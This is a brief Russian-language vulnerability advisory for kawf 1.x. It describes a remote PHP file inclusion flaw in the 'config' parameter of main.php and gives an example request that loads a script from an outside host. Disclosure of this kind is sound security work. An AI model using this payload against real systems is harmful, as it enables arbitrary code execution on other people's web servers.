Программа: kawf 1.x

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «config» сценарием main.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. 

Пример:

kawf/user/account/main.php?config=http://members.lycos.co.uk/o0xxdark0o3/ms.txt?



Оставить мнение